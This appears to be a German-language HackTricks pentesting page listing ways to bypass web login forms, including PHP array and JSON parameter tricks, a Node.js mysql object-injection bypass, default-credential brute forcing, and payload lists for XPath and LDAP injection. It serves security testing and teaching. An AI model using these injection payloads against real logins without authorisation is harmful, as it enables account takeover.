Login Bypass
Reading time: 5 minutes
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
Umgehung des regulären Logins
Wenn Sie eine Login-Seite finden, können Sie hier einige Techniken finden, um diese zu umgehen:
- Überprüfen Sie die Kommentare auf der Seite (nach unten und nach rechts scrollen?)
- Überprüfen Sie, ob Sie direkt auf die eingeschränkten Seiten zugreifen können
- Überprüfen Sie, ob Sie die Parameter nicht senden (keine oder nur 1 senden)
- Überprüfen Sie den PHP-Vergleichsfehler:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- Ändern Sie den Inhaltstyp in json und senden Sie json-Werte (bool true eingeschlossen)
- Wenn Sie eine Antwort erhalten, die besagt, dass POST nicht unterstützt wird, können Sie versuchen, das JSON im Body, aber mit einer GET-Anfrage mit
Content-Type: application/json
zu senden - Überprüfen Sie den möglichen Parsing-Fehler von nodejs (lesen Sie dies):
password[password]=1
- Nodejs wird diese Payload in eine Abfrage umwandeln, die der folgenden ähnelt:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
was dazu führt, dass das Passwort immer wahr ist. - Wenn Sie ein JSON-Objekt senden können, können Sie
"password":{"password": 1}
senden, um den Login zu umgehen. - Denken Sie daran, dass Sie, um diesen Login zu umgehen, immer einen gültigen Benutzernamen kennen und senden müssen.
- Hinzufügen der Option
"stringifyObjects":true
beim Aufruf vonmysql.createConnection
wird schließlich alle unerwarteten Verhaltensweisen blockieren, wennObject
im Parameter übergeben wird. - Überprüfen Sie die Anmeldeinformationen:
- Standardanmeldeinformationen der verwendeten Technologie/Plattform
- Häufige Kombinationen (root, admin, password, Name der Technologie, Standardbenutzer mit einem dieser Passwörter).
- Erstellen Sie ein Wörterbuch mit Cewl, fügen Sie den Standard-Benutzernamen und das Passwort (falls vorhanden) hinzu und versuchen Sie, es mit allen Wörtern als Benutzernamen und Passwort zu brute-forcen.
- Brute-Force mit einem größeren Wörterbuch (Brute force)
SQL Injection-Authentifizierungsumgehung
Hier finden Sie mehrere Tricks, um den Login über SQL-Injection zu umgehen.
Auf der folgenden Seite finden Sie eine benutzerdefinierte Liste, um den Login über SQL-Injection zu umgehen:
Keine SQL Injection-Authentifizierungsumgehung
Hier finden Sie mehrere Tricks, um den Login über No SQL Injections zu umgehen.
Da die NoSQL-Injections erfordern, dass die Parameterwerte geändert werden, müssen Sie diese manuell testen.
XPath Injection-Authentifizierungsumgehung
Hier finden Sie mehrere Tricks, um den Login über XPath Injection zu umgehen.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection Authentifizierungsumgehung
Hier finden Sie mehrere Tricks, um sich über LDAP Injection anzumelden.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Remember Me
Wenn die Seite die Funktionalität "Remember Me" hat, überprüfen Sie, wie sie implementiert ist, und sehen Sie, ob Sie sie missbrauchen können, um andere Konten zu übernehmen.
Redirects
Seiten leiten Benutzer normalerweise nach dem Login um. Überprüfen Sie, ob Sie diese Umleitung ändern können, um einen Open Redirect zu verursachen. Vielleicht können Sie einige Informationen (Codes, Cookies...) stehlen, wenn Sie den Benutzer auf Ihre Webseite umleiten.
Other Checks
- Überprüfen Sie, ob Sie Benutzernamen auflisten können, indem Sie die Login-Funktionalität missbrauchen.
- Überprüfen Sie, ob Auto-Complete in den Passwort/sensiblen Informationen Formularen aktiv ist:
<input autocomplete="false">
Automatic Tools
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.